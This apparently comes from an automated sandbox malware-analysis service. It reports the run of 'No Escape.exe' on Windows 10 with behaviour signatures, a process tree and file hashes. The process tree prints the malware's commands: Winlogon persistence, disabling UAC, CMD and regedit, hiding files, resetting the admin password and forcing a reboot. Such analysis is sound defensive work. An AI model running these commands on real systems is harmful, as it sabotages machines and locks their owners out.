Resubmissions

28/03/2025, 20:43

250328-zhwwpasqx4 10

28/03/2025, 20:40

250328-zgc27a1vh1 10

Analysis

  • max time kernel
    34s
  • max time network
    35s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250313-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28/03/2025, 20:43

Errors

Reason
Machine shutdown

General

  • Target

    image_2025-03-28_204056178.png

  • Size

    7KB

  • MD5

    daf0a316fba7e913fe8305e4c8a53205

  • SHA1

    0556975b72209b8067fd5b09ae21fa9c1bade785

  • SHA256

    fe1fd2bb77618fa06e548283188cf3696acc9dd2d8a4c3f4e03560f3dddc3103

  • SHA512

    e6fdaa9709f1a5a2a28eedeff4934f6060086f5eb60d4c9d576957c52d2c64fa43f475d44ceeb42cd5138a6dcafdadfef273817da1b19a3ab21e8ba1316f8f6e

  • SSDEEP

    96:X2fEYr0GPuMnGuwrwfHYF9scngjmij+cf1uq9cy+Sxwn2xcViPvcGcos2P/sIZw+:mEazpG/Ok9Xg0y9C2XzPjP/ccVas3Hwc

Malware Config

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Disables RegEdit via registry modification 1 IoCs
  • Downloads MZ/PE file 1 IoCs
  • Sets file to hidden 1 TTPs 2 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 12 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 17 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs .reg file with regedit 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 56 IoCs
  • Suspicious use of FindShellTrayWindow 34 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Windows\system32\mspaint.exe
    "C:\Windows\system32\mspaint.exe" "C:\Users\Admin\AppData\Local\Temp\image_2025-03-28_204056178.png"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of SetWindowsHookEx
    PID:5900
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
    1⤵
      PID:2500
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe"
      1⤵
      • Checks processor information in registry
      • Enumerates system info in registry
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:3532
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffbdefadcf8,0x7ffbdefadd04,0x7ffbdefadd10
        2⤵
          PID:3332
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1592,i,11402527223974652856,9572677078984230954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2220 /prefetch:3
          2⤵
          • Downloads MZ/PE file
          PID:2528
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2120,i,11402527223974652856,9572677078984230954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2116 /prefetch:2
          2⤵
            PID:5580
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2424,i,11402527223974652856,9572677078984230954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2400 /prefetch:8
            2⤵
              PID:2196
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3088,i,11402527223974652856,9572677078984230954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3108 /prefetch:1
              2⤵
                PID:3272
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3136,i,11402527223974652856,9572677078984230954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3176 /prefetch:1
                2⤵
                  PID:3140
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4440,i,11402527223974652856,9572677078984230954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4460 /prefetch:2
                  2⤵
                    PID:3340
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4716,i,11402527223974652856,9572677078984230954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4732 /prefetch:1
                    2⤵
                      PID:5092
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5316,i,11402527223974652856,9572677078984230954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5376 /prefetch:8
                      2⤵
                        PID:5244
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5580,i,11402527223974652856,9572677078984230954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5592 /prefetch:8
                        2⤵
                          PID:2268
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5804,i,11402527223974652856,9572677078984230954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5588 /prefetch:8
                          2⤵
                            PID:2452
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5948,i,11402527223974652856,9572677078984230954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5656 /prefetch:8
                            2⤵
                              PID:2504
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5952,i,11402527223974652856,9572677078984230954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5816 /prefetch:8
                              2⤵
                                PID:1740
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5944,i,11402527223974652856,9572677078984230954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5968 /prefetch:8
                                2⤵
                                  PID:928
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5912,i,11402527223974652856,9572677078984230954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5428 /prefetch:1
                                  2⤵
                                    PID:5716
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=3192,i,11402527223974652856,9572677078984230954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3052 /prefetch:1
                                    2⤵
                                      PID:5012
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=6048,i,11402527223974652856,9572677078984230954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=6076 /prefetch:1
                                      2⤵
                                        PID:5968
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=6200,i,11402527223974652856,9572677078984230954,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=6216 /prefetch:8
                                        2⤵
                                          PID:5584
                                        • C:\Users\Admin\Downloads\No Escape.exe
                                          "C:\Users\Admin\Downloads\No Escape.exe"
                                          2⤵
                                          • Checks computer location settings
                                          • Executes dropped EXE
                                          • Drops file in Program Files directory
                                          • System Location Discovery: System Language Discovery
                                          PID:3264
                                          • C:\Windows\system32\wscript.exe
                                            "C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\2016.tmp\2017.tmp\2018.vbs //Nologo
                                            3⤵
                                            • Checks computer location settings
                                            PID:2956
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\hello.bat" "
                                              4⤵
                                                PID:2916
                                                • C:\Windows\system32\attrib.exe
                                                  attrib +s +h C:\msg.exe
                                                  5⤵
                                                  • Sets file to hidden
                                                  • Views/modifies file attributes
                                                  PID:4876
                                                • C:\Windows\system32\attrib.exe
                                                  attrib +s +h C:\launch.exe
                                                  5⤵
                                                  • Sets file to hidden
                                                  • Views/modifies file attributes
                                                  PID:1204
                                                • C:\Windows\regedit.exe
                                                  regedit /s hello.reg
                                                  5⤵
                                                  • Runs .reg file with regedit
                                                  PID:1988
                                                • C:\Windows\system32\reg.exe
                                                  reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System /v DisableLogonBackgroundImage /t REG_DWORD /d 1
                                                  5⤵
                                                    PID:2940
                                                  • C:\Windows\system32\reg.exe
                                                    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d C:\Windows\system32\userinit.exe,C:\launch.exe /f
                                                    5⤵
                                                    • Modifies WinLogon for persistence
                                                    PID:2776
                                                  • C:\Windows\system32\reg.exe
                                                    reg add "HKEY_CURRENT_USER\control panel\desktop" /v wallpaper /t REG_SZ /d C:\hello.jpg /f
                                                    5⤵
                                                    • Sets desktop wallpaper using registry
                                                    PID:1388
                                                  • C:\Windows\system32\reg.exe
                                                    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1
                                                    5⤵
                                                      PID:436
                                                    • C:\Windows\system32\reg.exe
                                                      reg ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                      5⤵
                                                      • UAC bypass
                                                      PID:4436
                                                    • C:\Windows\system32\reg.exe
                                                      reg add HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2
                                                      5⤵
                                                        PID:5352
                                                      • C:\Windows\system32\reg.exe
                                                        REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
                                                        5⤵
                                                        • Disables RegEdit via registry modification
                                                        • Modifies registry key
                                                        PID:5732
                                                      • C:\Windows\system32\net.exe
                                                        net user Admin death
                                                        5⤵
                                                          PID:1436
                                                          • C:\Windows\system32\net1.exe
                                                            C:\Windows\system32\net1 user Admin death
                                                            6⤵
                                                              PID:3084
                                                          • C:\Windows\system32\shutdown.exe
                                                            shutdown /t 0 /r
                                                            5⤵
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:5616
                                                  • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                    "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                    1⤵
                                                      PID:5464
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                      1⤵
                                                        PID:2120
                                                      • C:\Windows\system32\LogonUI.exe
                                                        "LogonUI.exe" /flags:0x4 /state0:0xa3907855 /state1:0x41c64e6d
                                                        1⤵
                                                        • Modifies data under HKEY_USERS
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:2408

                                                      Network

                                                      MITRE ATT&CK Enterprise v15

                                                      Replay Monitor

                                                      Loading Replay Monitor...

                                                      Downloads

                                                      • C:\Program Files (x86)\date.txt

                                                        Filesize

                                                        120B

                                                        MD5

                                                        255a8e245b6ad378558b90cbe3dbc3d0

                                                        SHA1

                                                        6eb73f9f2034c113a2a6b1aab9a440a21928cfc2

                                                        SHA256

                                                        d3195bde888f9b8a71f2eb840222f1586b652d0ede9f39841a180ead03633ca9

                                                        SHA512

                                                        67e03d7bffa0dec32535b6da46d5b7f38d94a7c9a231aa2fa625b81485d41c1ecac95b08fe5b7a605fcfe1c7e37c55ee716c9045df90ea6e030b86e52ec09edf

                                                      • C:\Program Files (x86)\hello.bat

                                                        Filesize

                                                        1KB

                                                        MD5

                                                        b86fddd2b764f079615be5d4dc3e158d

                                                        SHA1

                                                        2510479054db1fe52cc2dcd3c7033d91204cb367

                                                        SHA256

                                                        2b2114784d15b0b0d5475256851b4d0d4da7181198c2a93a304ecedb98eaf091

                                                        SHA512

                                                        915363bc9f6e665358c8d25f5f5f51d64c53cb755be999013217162b126705ce641ea809047bc84511db7e3e383b848ec3932924baa8926d51a51d0037a5ca63

                                                      • C:\Program Files (x86)\hello.jpg

                                                        Filesize

                                                        110KB

                                                        MD5

                                                        057ea45c364eb2994808a47b118556a2

                                                        SHA1

                                                        1d48c9c15ea5548af1475b5a369a4f7b8db42858

                                                        SHA256

                                                        6e1115188aa00fb5ff031899100bacb0d34819707e069bca3eb53935ebb39836

                                                        SHA512

                                                        582c7ecf2d0c33c8706ff3f39aa926780aa8f0dc0ff5d563905a5100254b81b89def22206abee0871ab339a3d463de9e6ec1782d92198e8f386f173654b6e760

                                                      • C:\Program Files (x86)\hello.reg

                                                        Filesize

                                                        3KB

                                                        MD5

                                                        81427e9d5d10657b9edffd22e7b405bb

                                                        SHA1

                                                        f27ab62f77f827dbb32c66a35ac48006c47f4374

                                                        SHA256

                                                        bb21001c1c468e6e372d836952c3efb7fbdc98e9a20a1bfdcc4beb1b7a1e7f83

                                                        SHA512

                                                        b0ee65bcef13be7c17db6e06b96cd44774fcebe6f4a411b0073493ff53f795e3b7c49e921c3bd2e41256638bc161f5218d1c51b589c3e10164f8f2c0d1db1592

                                                      • C:\Program Files (x86)\launch.exe

                                                        Filesize

                                                        92KB

                                                        MD5

                                                        b4acc41d0e55b299ffeec11a8a20cf08

                                                        SHA1

                                                        bbee20882bdd9dcd24b54b6af6c48cf5efc8c6fa

                                                        SHA256

                                                        34bc0d5b6029a74b9cda56b72434ec1b55b6742ff5ef832d36027a987a63cd42

                                                        SHA512

                                                        d4fa9900d703ea12d508929718433f97581a23b63458e5070ff7749871a7f60889db45098ec2972687b864ba97ab4fc307e8c80c4450dee79c0a5738818d2794

                                                      • C:\Program Files (x86)\msg.exe

                                                        Filesize

                                                        9KB

                                                        MD5

                                                        331a0667b11e02330357565427dc1175

                                                        SHA1

                                                        d84c1ae0bf2c8ca1f433f0086ca86e07f61204c2

                                                        SHA256

                                                        fc7174e44a1d34040c3bc05ce24e648742a38a3accce22e8300d7059e4d12431

                                                        SHA512

                                                        1c47f0438dce58d473d93c10f233650df3e86d7e762a08b3a933da37683e76a079d275db4a1b4028d903f7e43f487173ba8bb25c4cff6f3e1161d0a5b2b18cec

                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                                        Filesize

                                                        649B

                                                        MD5

                                                        81589f141ad160b974e3ba84e5b45ab7

                                                        SHA1

                                                        3a5ff3daa666e06eba6656f1bd2c0f1031dbdd9c

                                                        SHA256

                                                        9463730fa279c3cee1e09b2367915ae8b4785b897e5cd8482376688e06c858eb

                                                        SHA512

                                                        c9429ffe6e3f5f92f8ff64ee73c7b5e22bf077b26a222dbf20fbfe84eeaf0aee729319959b5525d0fe3bd140a8d1b40c200208b246dce42700149f0365cef658

                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                        Filesize

                                                        2B

                                                        MD5

                                                        d751713988987e9331980363e24189ce

                                                        SHA1

                                                        97d170e1550eee4afc0af065b78cda302a97674c

                                                        SHA256

                                                        4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                        SHA512

                                                        b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                        Filesize

                                                        11KB

                                                        MD5

                                                        5077c2a4fe0ca40fdf31d63ef1fbd247

                                                        SHA1

                                                        4f85920c74b9769987c55d459960275d8764ef6f

                                                        SHA256

                                                        e2a409ac792b25663c52ef4ed1db8c70d11aa6f7fedc601fddf951baf73d3957

                                                        SHA512

                                                        4a4d30619d333056d31a8ca426925def54570bd8d61cccb8e06ee9adf9d0f566297df18006bd1873e6fb07b9597c918cb672a88f0b5d2eadf84d55d4e2c7c791

                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                        Filesize

                                                        11KB

                                                        MD5

                                                        5b77c276af4364b2b7545a0057298157

                                                        SHA1

                                                        6d876ed52f422730510970d46145874f008253d9

                                                        SHA256

                                                        8c0292356ec787042cc106f273b2b1be12784530fac1fcd02798edecc4f8d255

                                                        SHA512

                                                        7cf5d014a1ef89c025a46e9d9aafaa1da44f8fcfdc1f4790ab2791e12b4f4835d5f37c61f7ccc1defc576647f9093d2ae5dcee86da8e496125534ca5646bd6ef

                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                        Filesize

                                                        11KB

                                                        MD5

                                                        c699b53c6d9b993919c0702c3bfbb296

                                                        SHA1

                                                        aeb0a9488ea9a343fa0b84e112cd79f98f4697ee

                                                        SHA256

                                                        8df84350aa02afee6c8036f47f0a584c500fc52ca1e129beb19fe10f0537fa19

                                                        SHA512

                                                        c47711b1245196e3c1aa4a172e857ed91319c2fa8deabbbc23f07689e1c45bbe3b6823f61a2718035a2fa6158f76ceb778919da4bc7d8533f410a7acf8d73b81

                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                        Filesize

                                                        18KB

                                                        MD5

                                                        72e6edaef3786f075f86e7738e6b9799

                                                        SHA1

                                                        a5d3bf1352b8e694518f46bbc3ed4cca1bbecc40

                                                        SHA256

                                                        170cbc91ec7ad9ab03d2cd54390eb78fd0535a977a9827926a6f3da6b8d72659

                                                        SHA512

                                                        a56d8a81ee29970b2fdf0d0d3dfa4bb7667a7187b080de1b95751c3c4aacb1fc2f9d7ebbb8ac3ea257d6a41003f8952631eb3843a73c147f6f301a43b083596f

                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

                                                        Filesize

                                                        72B

                                                        MD5

                                                        b20dce3b4bacdc017f90df68b463917d

                                                        SHA1

                                                        2d75606d9ebc8fe19443de5c67c4fab96d4e09ec

                                                        SHA256

                                                        02e02363d1e87c49a169de25a03b57c19a932834c0792ed1fcd2b9af217dc303

                                                        SHA512

                                                        e75c5bf41d34648765f9a7cf09c96a750d7d056642b025f15bfd4501891581e67008b92a8890b73de1d282cd0eacc852878b3844c1ea9abd448fd6e2a8abb684

                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5811ae.TMP

                                                        Filesize

                                                        48B

                                                        MD5

                                                        d744760b6155f1a8a9a6a2d18adca486

                                                        SHA1

                                                        3c8299962ec02dd97550a5ff1d6e5687f96e564e

                                                        SHA256

                                                        45e4055caa52d6106b3a0f18278e383501b030f3a7f9ec6bb5b2e9244a3343aa

                                                        SHA512

                                                        b8b01787545d353cc8fc0ef16f7cf1ad65811676c201f71f664b7b67db4a91127f78561f9a1070206fcf5c505e2401564ce125a4a3965279a62dc5bd080373b9

                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\WebStorage\2\CacheStorage\index.txt

                                                        Filesize

                                                        76B

                                                        MD5

                                                        a7a2f6dbe4e14a9267f786d0d5e06097

                                                        SHA1

                                                        5513aebb0bda58551acacbfc338d903316851a7b

                                                        SHA256

                                                        dd9045ea2f3beaf0282320db70fdf395854071bf212ad747e8765837ec390cbc

                                                        SHA512

                                                        aa5d81e7ee3a646afec55aee5435dc84fe06d84d3e7e1c45c934f258292c0c4dc2f2853a13d2f2b37a98fe2f1dcc7639eacf51b09e7dcccb2e29c2cbd3ba1835

                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\WebStorage\2\CacheStorage\index.txt~RFe57ea02.TMP

                                                        Filesize

                                                        140B

                                                        MD5

                                                        71111116cf854743174af825f757cd40

                                                        SHA1

                                                        3bb34c21193dbd1c8bb348a590a65aff6b19549a

                                                        SHA256

                                                        170db7ba138074a78e8bca7887640d61dae214805d6fdb25cee8fc4197aea505

                                                        SHA512

                                                        3cdd9ee84e168c11455b6013ca4ee00bb34fc8d7469a21a6340635ebefd75cd909562d68b7fff899ced0ecf022197e12762272de3f30374d8ccd684998b64ff5

                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                        Filesize

                                                        155KB

                                                        MD5

                                                        cd93f7ec7cc7f83adafe9e6ff17876ea

                                                        SHA1

                                                        5b67bb2cd14c38e610017947146f4aab0f4008b6

                                                        SHA256

                                                        73a0919d78c358648a1b1d1225e2b5ba8a8b52817aa3ae3143d89eaa71817e62

                                                        SHA512

                                                        f554583f5a8920bdc22034f620717ac322923b6abb9d4642810d7c78ae6a61bc2d401a4ce2572785493182af569635232c1f33f3f9fa63ba426f153ac01ee9ba

                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\fd8ee665-4d5b-4ce2-8fd4-37dd58aa9165.tmp

                                                        Filesize

                                                        79KB

                                                        MD5

                                                        89cecb24bf2ccbf72530c98e122db92a

                                                        SHA1

                                                        8722d82ec7f8060b8114c39ed1b5cbd064b22023

                                                        SHA256

                                                        de23067abff4171e14e47976fdaf011b952a62c0a4291f1bf66ea4bd9838cd62

                                                        SHA512

                                                        88f579c0371764b5acfc6caee7e52cd5027507c51102a9158a143e8fe9fc1c45f309064ccaa8bfce170bdb2fe43f40ed2e309568de46b9c3e34f9dd17d9387a0

                                                      • C:\Users\Admin\AppData\Local\Temp\2016.tmp\2017.tmp\2018.vbs

                                                        Filesize

                                                        588B

                                                        MD5

                                                        67706bca9ceaba11530e05d351487003

                                                        SHA1

                                                        3a5ed77f81b14093a5f18c4d46895bc7ea770fee

                                                        SHA256

                                                        190a0d994512ed000cf74bd40fb0502988c2ac48855b23a73fd905c0305fc30f

                                                        SHA512

                                                        902ac91678d85801a779acbc212c75beba72f8da996b0ed1b148a326c2dd635b88210f9a503fbbffa5271335483eae972e6a00acbc01ec013cf355c080444598

                                                      • C:\Users\Admin\AppData\Local\Temp\scoped_dir3532_982163922\c554a0d6-8727-4da1-98a1-8d50192f884b.tmp

                                                        Filesize

                                                        152KB

                                                        MD5

                                                        dd9bf8448d3ddcfd067967f01e8bf6d7

                                                        SHA1

                                                        d7829475b2bd6a3baa8fabfaf39af57c6439b35e

                                                        SHA256

                                                        fa2232917a5656ea4f811936561ea6b7c92b3c0004c5e08ecb97636d3afc6f72

                                                        SHA512

                                                        65347df34378c2bbb34417e2cccfb3251a0b2412422cc190eed9df525b6e0a9948e0295ea3c33b3ad873ce81e369e89a138ac41d6eb7229546c3269107e661de

                                                      • C:\Users\Admin\Downloads\No Escape.exe

                                                        Filesize

                                                        771KB

                                                        MD5

                                                        2782877418b44509fd306fd9afe43e39

                                                        SHA1

                                                        b0c18bdf782ca9c4fa41074f05458ce8e0f3961b

                                                        SHA256

                                                        56d612e014504c96bb92429c31eb93f40938015d422b35765912ac4e6bd3755b

                                                        SHA512

                                                        8826881b3ab406ee4c1fabd4848161f8524aeaeb7c4397384d36840f947ef95c8560850b2409fbf761ff225cdc8ac6eb875b705476fe9574b23c7a5478505a86